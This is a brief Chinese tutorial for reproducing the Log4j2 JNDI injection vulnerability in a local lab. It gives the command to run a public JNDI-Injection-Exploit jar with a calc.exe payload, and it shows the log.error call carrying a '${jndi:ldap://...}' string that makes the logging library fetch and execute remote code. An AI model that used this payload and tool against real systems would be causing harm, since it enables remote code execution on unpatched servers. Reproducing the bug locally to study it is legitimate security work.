log4j2 漏洞复现
https://github.com/welk1n/JNDI-Injection-Exploit
1、运行该github项目(用idea运行ServerStart的main方法或运行jar包,jar包上面github地址有提供)
注意windows与mac的不同 ,jdk1.8及以下
运行jar包命令:
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "C:\Windows\System32\calc.exe" -A "127.0.0.1"
若是通过idea运行注意替换命令
运行之后会生成url ,url示例:ldap://192.168.88.1:1389/k5vyxp
2、运行带log4j2的项目 log.error(url),运行成功后会打开你的计算器
System.setProperty(“com.sun.jndi.ldap.object.trustURLCodebase”,“true”);
log.error("${jndi:ldap://192.168.88.1:1389/k5vyxp}")